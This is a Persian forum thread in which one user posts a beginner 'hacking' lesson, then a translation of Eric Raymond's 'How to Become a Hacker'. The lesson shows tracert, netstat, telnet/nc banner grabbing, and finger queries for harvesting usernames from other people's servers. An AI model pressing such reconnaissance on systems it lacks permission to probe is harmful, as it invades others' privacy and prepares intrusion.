نه عزيز من هم با حرفت کاملا موافقم.حتماً که نبايد وی بی باشه.در مقاله ها هم اشاره شده که ميتونه وی بی هم باشه.حالا اگر از زبان ديگه ای استفاده ميکنی برايه خودتی.فعلا مقاله ها به اونجايی نرسيده که زبان ها تقسيم بشن.فعلا عمومی هستش.تا بعد که کمی پيشرفته بشه.سعی ميکنم بيشتر راجب وی بی باشه
mazi_z_PSP
14-05-2007, 13:51
سلام دستور Tracert اين دستور ميگه که از چند تا کامپيوتر بگذريم تا به lover-hackers.comبرسيم دستور رو در CMdبه اين شکل اجرا کنين tracert your domainکه به جای your doaminآدرس سايتو بنويسيد. پورتهای باز کامپيوتر خودمان را ببينيم خوب شما الان چون با مفهوم پورت آشنا هستيد و ميدونيد در هک اساسی ترسن کارها رو پورت انجام ميشه و حتی با ميتوان با باز بودن پورت يک کامپيوتر بهش نفوذ کرد اين خيلی مهمه که پورتهای باز خودتونو ببينيد.از يکی از اين دو دستور استفاده ميکنيم . ۱-درCMDويندوزتان تايپ کنيدnetstat -anکه اين دستور پورتها رو به صورت عدد نشون ميده به خاطر اون numberآخرش ۲-دستور netstat -aمعادل اسمس آن پورت را نمايش ميدهد من قسمتيش واستون ميگم در خط اولش نوشته Protoکه معادل آن است که پروتکل شما TCP or UPDاست بعد ميريم سراغLocal Adress که اونجا هم IPرو نوشته وپورتها رو البته ماله خودتون است و در آخر Stateوضعيت اتصال رو نمايش ميده حالا با استفاده از اينا چيکار کنيم؟خوب ميتونيم ببينيم Trojanروش فعال است يا نه؟ يه توضيح کوچک در مورد تروجان بدم که اسبهای تروجان ويروسهايی هستن که پورت خاصی رو کامپيوتر طرف باز نگه ميدارن و شما به اون کامپيوتر نفوذ ميکنيد که معروفترین اونا ساب سون هست. به دست آوردن اسم کامپيوتر يک کلاينت: اول يه تعريف کوچولو برای کلاينت:به کامپيوترهايی که با Dial upوصل هستند يا در تعريف خودمانی همون کامپيوترهای خودمنو ميگيم .خوب برای به دست آوردن اسم کامپيوتر طرف بايد باهاش چت کنين اما برای مطمعن شدن بايد بگی طرف Voiceبده. اگه داد اين عبارتو تايپ کنيدnetstat اما مهمترين چيز اين است که به دنبال شماره ۵۱۰۱بگردين چون اين کمک به حال گيری ميکنه. معرفی پورتها و صحبت کردن با آنها مراحل آخر هک : خوب بايد ياد بگيريم با پورتها صحبت کنيم اين مطلب راحته و همش از يه دستور استفاده ميشه صحبت با پورت ۱۳ ۱-پورت ۱۳ که پورت Daytimeناميده ميشه خيلی ساده لوحه و هميشه راست ميگه البته هميشه اين پورتو ميبندن يا به قول معروف خفش ميکنن برای صحبت کردن با آن اين دستور را اجرا کنيد telnet ip adress 13يا nc -v ip adress 13 خوب به چه درد ميخوره؟ميتونيم تشخيص بديم کامپيوتر در ايران است يا نه با توجه به تاريخ و ساعتش مفهومه که؟ صحبت با پورت ۷ اين پورت کاره خاصی نميکنه فقط هر چی بهش بدين براتون همونو پس ميفرسته چه مسخره!!! بعد اينم دستورشtelnet your ip adress 7يا nc -v ip 13و به جای همه ی دستورات بالا به جای ip ياypur ip adressشماipسايتتونو بنويسيد صحبت با پورت ۸۰ اين پورت کارش اينه که برای جستجوی صفحات اينترنتی ميره اولين دستور ميگه هر چی headerهست رو نشون بدهGET /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]نتايج من ديگه نشون ندادم خودتون امتحان کنيد. جالبه!!! دومين دستور ميگه که هر چی هست يعنی در اينجا whatکار ميبريم نشون بده GET /what/everولی شما رای اين کار مسيرو بديد کجاهارو ميخوان مثلاexe صحبت با پورت ۷۹ مهمه خوب اين پورت Endeحاله يعنی اينکه شما ميتونين با استفاده از اين دستور بفهمين چند نفر از کاربران ISPشما onهستن و همچنين شايد خوش شانس باشيد و ISPدر پيتس باشه USER NAMEهم ميده و مثلا اسم يه کامپيوتر alborzاست خوب اينم ۳ تا دستور برای گرفتن اطلاعات telnet alborz.com79 nc -v alborz.com79 finger @alborz.com79 اين پورت بستگی به سرور داره ممکنه usernameهم نشون بده و حتی نام نام خانوادگی افراد آنلاين پس همين الان دسته به کار شويد و به serverهای مختلف telnetکنين و اين usernameهام که گفتم به چه دردی ميخوره به درده دود کردن اينترنت ميخوره صحبت با پورت ۱۱۰ اين پورت برای خواندن ايمیل به کار ميره مثلا من در نو آور ايميل دارم پس ميخوام ايميلهامو چک کنم تايپ ميکنمtelnet mail.noavar.com 110ياnc -v mail.noavar.com 110 بعدش وارد يه محيط مثل ftpميشين بعد از شما userوpassميخوادکه شما بدين خوب الان در درون ايميل هايتان غلط ميزنيد و اين دستورهای مهم را هم اجرا کنيد اين دستور حجم کليه ايميلهای رسيده را ميگهstat اين دستور ليست پيام ها رو ميگه list در اين دستور متن نامه رو ميخوانيم البته بگم شماره ی مورد نظرتونو برای خواندنش وارد کنيدretr پاک کردن ايميل dele 54 برای خارج شدنquit امیدوارم از این آموزش خوشتو آمده باشه اگه خدا بخواد حرفه ایشم می گذارم اگه بد بود ببخشید دیگه بهتر از این نتونستم بگم امیدوارم به کارتون خورده باشه شاد و پیروز باشید
mazi_z_PSP
14-05-2007, 14:13
سلام .با اجازه دوستان و مديران محترم من يک سری مقالات دارم درباره هک که عمومی هستش و به طور کامل هکر شدن رو ياد ميده.اما نه با يک زبان خاص.انتخاب زبان رو به عهده خودتون ميزاره.این مطالب رو به صورت درس به درس ميزارم تا بقيه استفاده کنن.از الان بگم ممکنه زياد ربطی به وی بی نداشته باشه اما خيلی مفيد هستش.اگر این مطالب رو تا آخر به خونين ميتونين ازشون در وی بی هم استفاده کنين
mazi_z_PSP
14-05-2007, 14:15
نويسنده: Eric Steven Raymond (esr@thyrsus.com) مترجم: ميثم فرضعلیپور (meisam460@hotmail.com?subject=HTBH)
يک هکر کيست؟
فايل اصطلاحات هکرها ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) شامل تعدادی از تعاريف برای واژهی هکر است. اکثراً شامل انجام کارها با مهارت فنی و اشتياق در حل مسائل و غلبه بر محدوديتها. ولی اگر شما میخواهید بدانید که چگونه یک هکر شوید، تنها دوتای آنها به دردتان میخورد.
جامعهای با يک فرهنگ اشتراکی متشکل از برنامهنويسان خبره وجود دارد که پیشینهی آن به دهههای قبل و زمان اولين کامپيوتر کوچک و آزمايشهای اوليهی آرپانت بازمیگردد.
اعضای اين جامعه اصطلاح هکر را به وجود آوردند. هکرها اينترنت را ساختند. هکرها سيستمعامل يونيکس را تبديل به سيستمعاملی کردند که اکنون میبينيد. هکرها يوزنت را اداره میکنند. هکرها وب را به وجود آوردند. اگر شما بخشی از اين فرهنگ هستيد، اگر شما در آن همکاری کردهايد و اگر افراد ديگر اين جامعه شما را يک هکر میدانند، پس شما يک هکر هستيد.
نگرش هکرها محدود به فرهنگ هکرهای کامپيوتر نيست. افرادی وجود دارند که منش هکرها را در موضوعات ديگر مانند الکترونيک يا موسيقی نيز بکار میبرند.
درواقع شما میتوانيد آن را در بالاترين سطح از هر شاخهی علم يا هنر بيابيد.
هکرهای کامپيوتر اين روح اصلی را در موضوعات ديگر نيز به رسميت میشناسند و میتوان به آنها نيز هکر گفت.
- و برخی معتقدند ماهيت اصلی هکر بودن مستقل از واسطههای خاصی است که هکرها با آنها کار میکنند. اما بقيهی اين متن به مهارتها و منشهای هکرهای کامپيوتر و عقايد رايج در مورد فرهنگ اشتراکی که سرچشمهی واژهی هکر است، خواهدپرداخت.
گروه ديگری از مردم وجود دارند که با سروصدای زيادی خودشان را هکر مینامند. اما آنها هکر نيستند. آنها (اکثراً پسرهای نوجوان) افرادی هستند که به صورت غير مجاز به کامپيوترها دسترسی پبدا میکنند يا از سيستمهای تلفن سوء استفاده میکنند.
هکرهای واقعی اين افراد را کرکر(Cracker) مینامند و کاری به آنها ندارند. اکثر هکرهای واقعی معتقدند که کرکرها تنبل و بیمسئولیت بوده و چندان هم باهوش نيستند. اشيايی که میتوانند سيستمهای امنيتی را از کار بياندازند، شما را هکر نمیکنند، همانطور که «روشن کردن اتوموبيل با تکهای سيم شما را مهندس مکانيک نمیکند»، .
متاسفانه اکثر روزنامهنويسان و نويسندگان به اشتباه واژهی هکر برای معرفی کرکرها بهکار میبرند و اين کار هکرها را بسيار عصبانی میکند.
تفاوت اساسی اين است: هکرها چيزهايی میسازند، کرکرها آنها را خراب میکنند.
اگر شما میخواهيد هکر شويد، به خواندن ادامه دهيد. اما اگر میخواهيد کرکر شويد، گروه خبری alt.2600 (news:alt.2600) را بخوانيد و آماده باشيد که به زودی در زندان کارمجانی انجام دهيد. آنوقت متوجه خواهيد شد که آنقدرها که فکر میکرديد، باهوش نبوديد. و این تمام چيزی است که من به شما در مورد کرکرها میگويم.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
mazi_z_PSP
14-05-2007, 14:16
نويسنده: Eric Steven Raymond (esr@thyrsus.com) مترجم: ميثم فرضعلیپور (meisam460@hotmail.com?subject=HTBH)
مرامنامهی هکری
هکرها مشکلات را حل میکنند و سازنده عمل میکنند. آنها به آزادی و کمک داوطلبانهی دوجانبه اعتقاد دارند. برای پذيرفته شدن به عنوان يک هکر، شما بايد به نحوی رفتار کنيد مانند آنکه خودتان اين نوع نگرش را داريد و برای اینکه اینگونه رفتار کنید شما باید واقعاً به آن اعتقاد داشته باشيد .
اما اگر شما فکر میکنيد که نگرش اجتماعی هکرها فقط راهی برای پذيرفته شدن در اين فرهنگ است، شما اصل موضوع را فراموش خواهيد کرد. تبديل شدن به فردی که به اين موضوعات اعتقاد دارد، برای کمک به يادگيری و با انگيزه نگاهداشتن شما مهم است. مانند همهی هنرهای سازنده، بهترين راه برای استاد شدن پيروی کردن از خط فکری استاد است. نه فقط به صورت فکری بلکه همچنين به صورت حسی. يا مانند آنچه اين شعر مدرن Zen میگويد:
تا که راه یابی:
به استاد بنگر
به دنبالش باش
با او برو
از نگاه او بنگر
استاد شو پس اگر شما میخواهيد يک هکر بشويد، جملات زير را تکرار کنيد تا به آنها اعتقاد پيدا کنيد.
mazi_z_PSP
14-05-2007, 14:17
۱-جهان مملو از مسائل جذاب است که در انتظار حل شدن به سر میبرند
هکر بودن بسيار هیجانانگیز است. اما اين نوع هیجان به تلاش زيادی نياز دارد و تلاش محتاج انگيزه است.ورزشکاران موفق انگيزهی خودشان را از لذتی که در غلبهی آنها بر محدوديتهای فیزیکی بدنشان در آنها به وجود میآيد، بدست میآورند. بهطور مشابه برای هکر بودن شما بايد انگيزهی اوليه را از حل مشکلات و افزايش مهارتها و تمرين هوش خود بدست آوريد.اگر شما جزو افرادی نيستيد که ذاتاً اينگونه فکر میکنند، برای هکر شدن بايد چنين شويد.
در غيراينصورت شما خواهيد ديد که انرژی هکری شما به وسيلهی عواملی مانند سکس و پول و مشهورشدن تضعيف میشود (همچنين شما بايد ايمان به ظرفيت يادگيری خودتان را بيشتر کنيد -باور داشته باشيد که حتی اگر تمام چيزهايی که برای حل مسئله لازم است را ندانيد، اگر فقط از عهدهی قسمت کوچکی از آن برآييد و آن را ياد بگيريد، به اندازهای که برای حل مسئله لازم است ياد خواهيد گرفت- و به همين شيوه ادامه دهيد تا مسئله حل شود)
mazi_z_PSP
14-05-2007, 14:17
۲-هيچ مسئلهای نبايد دو بار حل شود
ذهنهای سازنده، منابع باارزش و محدودی هستند. آنها نبايد برای دوباره اختراع کردن چرخ تلف بشوند در حالی که مسائل جذاب بسيار زيادی وجود دارد.
برای رفتار کردن مانند يک هکر، شما بايد اعتقاد داشته باشيد که زمان فکر کردن هکرهای ديگر بسيار پرارزش است. بنابراين به اشتراک گذاشتن اطلاعات تقريباً يک کار اخلاقی است. مسائل را حل کنيد و سپس راهحل را منتشر کنيد تا هکرهای ديگر بتوانند به عوض دوباره حل کردن مسائل حل شده، مسائل جديد را حل کنند. (لازم نيست معتقد باشيد که بايد همهی یافتههای خودتان را منتشر کنيد. گرچه هکرهايی که اين کار را انجام میدهند بيشترين احترام را در ميان هکرهای ديگر دارند. اين با معيارهای هکرها سازگار است که به اندازهی کافی از آنها بفروشيد تا بتوانيد ضروريات خود و نيازهای کامپیوترتان را تامين کنيد. خوب است که از مهارتهای هکری خودتان برای تامين خانواده يا حتی ثروتمند شدن استفاده کنيد. مادامی که وظيفهی خودتان را به هنرتان و هکرهای ديگر فراموش نکنيد)
mazi_z_PSP
14-05-2007, 14:18
خب دوستان این تنها قسمت کوچکی از این مقاله بود.منتظر ادامه مطالب باشيد
mazi_z_PSP
14-05-2007, 14:19
۳-کسالت و بیگاری مضر هستند
هکرها (و به طور کلی افراد خلاق) هيچ وقت نبايد کسل بشوند يا کارهای سخت و تکراری انجام بدهند. زيرا در اينگونه موارد آنها به کاری که میتوانند انجام دهند (حل مسائل جديد) نمیپردازند و اين بیفايده بودن هر کسی را میرنجاند. بنابراين خستگی و مشقت نهفقط ناخوشايند بلکه واقعاً مضر هستند.
برای رفتار کردن مانند يک هکر، شما بايد کاملاً ايمان داشته باشيد که میخواهيد ناخودآگاه از چيزهای کسل کننده تا آنجا که ممکن است دور شويد.نه فقط به خاطر خودتان بلکه برای هر کس ديگر (مخصوصاً هکرها). (يک استثنای بارز در اينجا وجود دارد. هکرها ممکن است بعضی اوقات کارهايی را انجام بدهندکه برای يک ناظر تکراری يا خسته کننده به نظر بيايد. به عنوان تمرين ذهنی يا به منظور به دست آوردن يک مهارت يا انجام دادن تمرينات مخصوص، شما به طرز ديگری نمیتوانيد عمل کنيد. اما شما در اين انتخاب آزادی داريد.- هيچ فرد اندیشمندی، نبايد به اجبار در وضعيتی قرار گيرد که او را کسل کند.)
mazi_z_PSP
14-05-2007, 14:20
۴-آزادی خوب است
هکرها به طور طبيعی مخالف استبداد هستند. هر کسی که بتواند به شما دستور بدهد، میتواند شما را از حل کردن مسائلی که مجذوبشان شدهايد باز دارد. و مسلماً به طوری که ذهنهای مستبد کار میکند، معمولاً دليلهای احمقانه و وحشتناکی برای چنين کاری پيدا میکنند. پس با روش استبدادی هر کجا که آن را يافتيد بايد مبارزه کنيد وگرنه شما و ديگر هکرها را خفه میکند.
(اين به معنای جنگ با تمام قدرتها نيست -کودکان بايد راهنمایی(تادیب) شوند، خلافکاران بايد محدود بشوند. يک هکر ممکن است موافق باشد که نوعی از قدرت را به منظور به دست آوردن چيزی که او میخواهد، بپذيرد. اما اين يک معاملهی آگاهانه و محدود است. آنجايی که فردی تسليم خواستههای ديکتاتور میشود، يک پيشنهاد نيست.) ديکتاتورها در سانسور و پنهانکاری موفق هستند. آنها برای همکاریهای داوطلبانه و به اشتراک گذاشتن اطلاعات مزاحمت ايجاد میکنند. آنها فقط مشارکت در کارهايی را میپسندند که خودشان آن را کنترل کنند. پس برای رفتار کردن مانند يک هکر، شما بايد يک دشمنی ذاتی با سانسور، پنهانکاری، فريبدادن و استفاده از زور برای تحت فشار قرار دادن افراد مسئول را در خود پرورش دهيد و بر طبق این عادت عمل کنید.
mazi_z_PSP
14-05-2007, 14:20
۵-نگرش جايگزينی برای مهارت نيست
برای هکر شدن شما بايستی تعدادی از اين نگرشها را در ذهنتان توسعه بدهيد. اما کپی برداری محض از عقايد به تنهايی شما را هکر نمیسازد همانگونه که شما را قهرمان ورزشی يا ستارهی راک نمیکند. هکر شدن به هوش، تمرين، از خود گذشتگی و سختکوشی نياز دارد.
بنابراين شما بايد ياد بگيريد که به منش اتکا نکنيد و به هر نوع توانايی احترام بگذاريد. هکرها اجازه نمیدهند که ژستها وقت آنها را تلف کنند. اما آنها احترام زيادی برای توانايی قائلاند. مخصوصاً توانايی در زمينهی هکری. اما توانايی در هر کاری خوب است. توانايی در بدست آوردن مهارتهايی که افراد کمی میتوانند در آن زمينه به درجهی استادی برسند، خيلی خوب است و توانايی در مهارتهايی که مستلزم زکاوت، مهارت و تمرکز هستند بهترين است. اگر شما به توانايی احترام بگذاريد، از توسعهی توانايیهای خود لذت خواهيد برد و سختکوشی و فداکاری بيشتر از مشقت به کاری مشتاقانه بدل خواهد شد. اين طرز فکر برای هکر شدن حياتی است.
mazi_z_PSP
20-05-2007, 12:15
با تشکر از دوستانی که نظر دادن. اینم ادامه مقالات
mazi_z_PSP
20-05-2007, 12:17
نويسنده: Eric Steven Raymond (esr@thyrsus.com)
مترجم: ميثم فرضعلیپور (meisam460@hotmail.com?subject=HTBH)
مهارتهای بنيادی هکرها
داشتن منش هکرها برای هکر شدن حياتی است اما مهارتها اهميت بيشتری دارند. منش جايگزينی برای مهارت نيست. مجموعهای از مهارتهای پايه وجود دارند که شما بايستی برای هکر شدن داشته باشيد. اين مهارتها با گذشت زمان، هنگامی که تکنولوژی مهارتهای جديدی را میسازد و مهارتهای قديمی را منسوخ میکند، به آرامی تغيير میکنند. در گذشته برنامهنويسی به زبان ماشين شامل این مجموعه بود و تا اين اواخر زبان HTML جزو این مهارتها نبود. اما اکنون بهوضوح شامل موارد زیر است:
۱-چگونه برنامه نوشتن را ياد بگيريد
البته اين يک مهارت پايهای برای هکرهاست. اگر شما هيچ کدام از زبانهای برنامهنويسی را بلد نيستيد، من به عنوان شروع پايتون را به شما پيشنهاد میکنم. پايتون با ظرافت طراحی شده و به خوبی مستند سازی شده است و نسبتاً ابتدایی است.
با وجود اينکه پايتون به عنوان اولين زبان برنامهنويسی برای یادگيری خوب است ولی تنها يک اسباب بازی نيست. پايتون خيلی قدرتمند و انعطاف پذير بوده و برای پروژههای بزرگ مناسب است. من يک ارزيابی از پايتون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را با جزئيات کامل نوشتهام. منابع آموزشی ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) خوبی در سايت پايتون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) در دسترس هستند.
جاوا نيز زبان خوبی برای آموزش برنامهنويسی است. جاوا از پايتون مشکلتر است ولی کدهای سريعتری توليد میکند. فکر میکنم به عنوان زبان دوم برنامهنويسی خیلی خوب باشد.
متاسفانه منابع پيادهسازی شرکت Sun هنوز اختصاصی هستند. به علت وجود يک مفسر منبعباز خوب برای جاوا اين امر چندان بحث زيادی به وجود نمیآورد. مشکل واقعی توابع کتابخانهای هستند که با زبان منتقل میشوند. توابع کتابخانهای منبعباز نسبت به توابع Sun ضعيفتر هستند. بنابراين اگر شما تصميم داريد که جاوا را ياد بگيريد، به عوض وابستگی به کد اختصاصی Sun با يک پيادهسازی منبعباز کار کنيد.
اما توجه کنيد که اگر تنها يک يا دو زبان برنامهنويسی را بلد باشيد، به مهارتهای يک هکر دست پيدا نخواهيد کرد يا حتی صرفاً يک برنامهنويس هم نخواهيد شد. شما بايد بياموزيد که بهطور کلی چگونه در مورد مسائل برنامهنويسی مستقل از هر زبانی فکر کنيد. برای اينکه يک هکر واقعی شويد، شما بايد به سطحی برسيد که بتوانيد با ارتباط دادن موضوعات موجود در راهنما به دانستههای خود، در طی چند روز يک زبان را ياد بگيريد. بنابراین شما بايستی چندين زبان کاملاً متفاوت را ياد بگيريد.
اگر شما بهطور جدی به برنامهنويسی بپردازيد، مجبوريد که زبان C که زبان هستهی يونيکس است را ياد بگيريد. زبان ++C خيلی شبيه C است. اگر شما يکی از آنها را بدانيد، ياد گيری ديگری چندان مشکل نخواهد بود. با وجود اين هيچ کدام از آنها بهعنوان اولين زبان برنامهنويسی برای يادگيری خوب نيستند. درواقع هرچه بيشتر از برنامهنويسی با زبان C اجتناب کنبد، بازدهی بیشتری خواهيد داشت.
زبان C بسيار کارآمد است و در استفاده از منابع سيستم بسيار صرفهجويی میکند. متاسفانه زبان C کارآیی خودش را با نياز به کدنويسی سطح پايين برای مديريت منابع سيستم (مانند حافظه) بدست میآورد. همهی کدهای سطح پايين پيچيده و مستعد باگ هستند و وقت زيادی را در مرحلهی اشکال زدايی به خود اختصاص میدهند. با کامپيوترهای امروزی و قدرتی که آنها دارند، اين معمولاً معاملهی خوبی نيست. بهتر است از زبانهايی استفاده کنيم که کمی وقت کامپيوتر را تلف کنند ولی از زمان شما بسيار مفيدتر استفاده کنند. مانند پايتون .
زبانهای برنامهنويسی ديگری که اهميت ويژهای برای هکرها دارندشامل Perl ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) و LISP ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) میشوند. Perl به دلیل کاربردی بودن ارزش يادگيری دارد. Perl به طور گستردهای در صفحات وب فعال و مديريت سيستمها استفاده میشود. بنابراين حتی اگر شما برنامهای به زبان Perl ننويسيد، بايد بتوانيد برنامههايی را که به زبان Perl نوشته شدهاند را بخوانيد. اکثر افراد از Perl در جایی استفاده میکنند که من به شما پایتون را توصیه کردم (خودداری از برنامهنويسی به زبان C در کارهايی که به امکانات C نيازی ندارد). شما نياز پيدا خواهيد کرد که کدهای نوشته شده توسط آنها را بخوانيد.
LISP به دليل ديگری ارزش يادگيری دارد. LISP به روشنفکری عميقی نياز دارد که پس از یادگیری آن را به دست خواهید آورد.اين تجربه شما را برنامه نويس بهتری خواهد کرد. حتی اگر چندان برنامهای با LISP ننويسيد. (شما به راحتی میتوانيد با نوشتن و تغيیر دادن محيط ويرايش Emacs تجربهی مقدماتی با LISP را بدست آوريد)
بهترين روش يادگيری همهی زبانهای گفته شده (پايتون، جاوا، ++C/C، پرل و LISP) است. اين زبانها علاوه بر اينکه مهمترين زبانهای برنامهنويسی در دنيای هک هستند، نمايانگر خط مشیهای متفاوت در برنامهنويسی نيز میباشند و هرکدام معلومات باارزشی به شما میدهند.
من نمیتوانم در اينجا دستورالعمل کاملی در مورد اينکه چگونه برنامه بنويسيد ارائه دهم. کتابها و دورههای آموزشی نيز چنين کاری نمیکنند. (بيشتر و شايد همهی هکرها خودشان مهارتهايشان را ياد گرفتهاند) برنامهنويسی يک مهارت پيچيده است. شما میتوانيد امکانات يک زبان برنامهنويسی -قسمتی از دانش مورد نياز برای برنامهنويسی- را از کتابها ياد بگيريد. اما طرز فکری که اينگونه اطلاعات را به مهارتهای کاربردی تبديل میکند، تنها به وسيلهی تمرين و کارآموزی بدست میآيد و اين يعنی ۱)خواندن کد و ۲)نوشتن کد.
يادگرفتن برنامهنويسی مانند يادگيری خوب نوشتن يک زبان طبيعی است. بهترين روش برای اين کار خواندن برنامههايی است که به وسيلهی استادان نوشته شده است. پس از آن سعی کنيد خودتان برنامههايی بنويسيد و دوباره خيلی بيشتر بخوانيد، کمی بيشتر بنويسيد، خيلی بيشتر بخوانيد... اين چرخه را ادامه دهيد تا زمانی که برنامههای شما قدرت و کارايی برنامههای نوشته شده نوسط استادان را بدست آورند. سابقاً يافتن سورسکدهای خوب کار سختی بود. به دليل اينکه تعداد کمی کد منبع از برنامههای بزرگ برای خواندن و تغيير دادن در اختيار هکرهای تازهکار بود. اما اکنون اين وضعيت به طرز چشمگیری تغيير کرده است. نرمافزارهای منبعباز، ابزارهای برنامهنويسی و سيستمهای عامل (که همهی ّنها به وسيلهی هکرها تهيه شدهاند) اکنون به سادگی در دسترس هستند. که مرا به نوشتن مبحث بعدی ترغیب میکند.
mazi_z_PSP
20-05-2007, 12:18
۲-يکی از يونيکس های منبعباز را بدست بياوريد و ياد بگيريد که چگونه آن را بکار ببريد
من فرض میکنم که شما صاحب يک کامپيوتر شخصی هستيد يا به يک کامپيوتر شخصی دسترسی داريد. همهی کودکان امروزه يک کامپيوتر دارند. مهمترين قدمی که هر مبتدی در جهت بدست آوردن مهارت های هک میتواند بردارد، تهيهی يک نسخه از Linux يا BSD Unix، نصب کردن آن بر روی کامپيوتر خود و به کار بردن آن است.
درست است که سيستمعاملهای ديگری نيز به جز يونيکس وجود دارند اما آنها در قالب دودويی منتشر میشوند و شما نمیتوانيد سورس کد آنها را بخوانيد يا تغيير دهيد. سعی برای يادگيری هک بر روی سيستمهای دارای ويندوز، MacOS و يا هر سيستم منبع بستهی ديگر مانند تلاش برای یادگیری رقص در لباش شوالیه است .
تحت OS/X اين مسئله امکان پذير است اما فقط بخشی از این سيستم منبع باز است و به احتمال زياد شما را به بنبست خواهد کشاند و بايد مواظب باشيد که به کد اختصاصی اپل عادت نکنيد. اگر شما بر روی يونيکس تمرکز کنيد، با چشمان بسته نيز چيزهای مفيدی ياد میگيريد.
يونيکس سيستم عامل اينترنت است. شما میتوانيد بدون دانستن يونيکس از اينترنت استفاده کنيد. اما بدون داشتن درک درستی از يونيکس هرگز هکر اينترنتی خوبی نخواهيد شد. به همين دليل امروزه جامعهی هکرها شديداً يونيکس محور است. (اين موضوع همواره صادق نبوده و برخی از هکرهای قديمی از اين موضوع راضی نيستند.اما همزيستی بين يونيکس و اينترنت به قدری محکم است که حتی قدرت مايکروسافت هم نمیتواند جلوی آن را بگيرد.)
پس يک يونيکس را انتخاب کنيد. من خودم لينوکس را دوست دارم اما انتخابهای ديگری نیز وجود دارند. (شما میتوانيد همزمان لينوکس و ويندوز را بر روی سيستم خود اجرا کنيد) آن را ياد بگيريد، بکار ببريد و تغيير دهيد. به وسيلهی آن از اينترنت استفاده کنيد. سورس کد آن را بخوانيد و تغيير دهيد. شما ابزارهای برنامهنويسی بهتری به دست خواهيد آورد. که هر سيستم ويندوز در رويای بهدست آوردن آنهاست. (شامل C، LISP، Python و Perl) و اين شما را سرگرم خواهد کرد. و شما بدون آنکه متوجه شويد معلومات زيادی کسب خواهيد کرد و هنگامی که مانند يک استاد به مسائل نگاه کنيد به اين موضوع پیمیبريد.
برای بدست آوردن اطلاعات بيشتر در مورد يادگيری يونيکس Loginataka ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد. شما ممکن است مايل باشيد که نگاهی نيز به «هنر برنامهنويسی در يونيکس» ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) بياندازبد
برای بدست آوردن اطلاعات بيشتری در مورد لينوکس، سايت «لينوکس آنلاين» ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد. شما میتوانيد از آنجا لينوکس را داونلود کنيد يا (يک ايدهی بهتر) يک گروه محلی از کاربران لينوکس را بيابيد که به شما در نصب لينوکس کمک کنند. از ديدگاه يک کاربر جديد لينوکس، همهی توزيعهای لينوکس بسيار به هم شبيه هستند.
شما میتوانيد منابع کمکی يونيکس برکلی را در [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) بيابيد.
من يک متن در مورد اطلاعاتی که مبتديان برای کار با يونيکس و اينترنت لازم دارند ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نوشتهام. اگر شما يک مبتدی هستيد من نصب هيچکدام (يونيکس و لينوکس) توسط خودتان را توصيه نمیکنم.برای نصب لينوکس، يک گروه محلی از کاربران لينوکس را پيدا کنيد و از آنها کمک بخواهيد.
mazi_z_PSP
20-05-2007, 12:19
۳-یاد بگيريد که چگونه از وب استفاده کنيد و HTML بنويسيد
اکثر دستاوردهای جامعهی هکرها کارهايشان را در پشت پرده انجام میدهند. آنها به کارکرد کارخانهها، ادارات و دانشگاهها کمک میکنند بدون آنکه تاثير قابل رويتی بر زندگی ديگران بگذارند. در اين ميان وب يک استثنای بزرگ است. سرگرمی بزرگ هکرها که حتی سياستمداران اعتراف میکنند که در حال تغيير دادن دنياست. به اين دليل (و دلايل زياد ديگر) لازم است بدانيد که با وب چگونه کار کنید.
اين بدان معنا نيست که فقط استفاده از يک مرورگر را ياد بگيريد. (هر کسی میتواند اين کار را انجام دهد) شما بايد HTML (زبان نشانه گذاری وب) را یاد بگیرید. اگر شما برنامهنويسی بلد نيستيد، نوشتن HTML به شما تعدادی عادت ذهنی میدهد که اين عادات به يادگيری شما درآينده کمک خواهد کرد. پس يک صفحهی خانگی درست کنيد و سعی کنيد که از XHTML که زبان دقيقتری نسبت به HTML سنتی است، بيشتر استفاده کنيد. (آموزشهای مقدماتی خوبی در اين زمينه وجود دارد. مانند اين ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]))
اما صرفاً داشتن يک صفحهی خانگی شما را يک هکر نمیکند. اينترنت پر از صفحات وب است. اکثر آنها بیهدف، بیمحتوا، آشغال و آشغالهای بسيار جذاب هستند. يادتان باشد که محتوای تمام آشغالها يکسان است. (برای اطلاعات بيشتر در اين مورد صفحهی جهنم HTML ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد)
برای مفيد بودن صفحهی شما بايد بامحتوا باشد. صفحهی شما بايد جالب باشد و/يا برای هکرهای ديگر مفيد باشد. اين موضوع ما را به بحث بعدی میکشاند.
۴-اگر زبان انگليسی شما خوب نيست، آن را ياد بگيريد
شخصاً به عنوان يک فرد انگليسی زبان آمریکایی قبلاً از اين پيشنهاد ناراضی بودم.چرا که ممکن بود به عنوان نوعی استعمارطلبی فرهنگی تلقی شود. اما افراد متعددی که زبانهای مادری ديگری داشتند از من خواستند که بگويم انگليسی زبان کاربردی فرهنگ هکرها و اينترنت است. شما بايد برای فعاليت در جامعهی هکرها آن را بدانيد.
